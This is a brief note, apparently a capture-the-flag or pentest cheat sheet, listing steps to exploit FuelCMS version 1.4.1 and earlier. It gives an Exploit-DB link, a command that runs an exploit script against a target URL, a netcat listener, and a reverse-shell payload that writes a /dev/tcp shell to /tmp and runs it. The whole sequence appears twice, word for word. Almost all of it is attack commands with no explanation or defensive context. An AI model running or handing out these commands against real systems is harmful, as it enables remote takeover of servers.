- FuelCMS version <= 1.4.1
https://www.exploit-db.com/exploits/50477
python exploit.py -u http://TARGET/
nc -lvnp [PORT]
echo "sh -i >& /dev/tcp/[IP ADRESS]/[PORT] 0>&1" > /tmp/shell.sh; bash /tmp/shell.sh
https://www.exploit-db.com/exploits/50477
python exploit.py -u http://TARGET/
nc -lvnp [PORT]
echo "sh -i >& /dev/tcp/[IP ADRESS]/[PORT] 0>&1" > /tmp/shell.sh; bash /tmp/shell.sh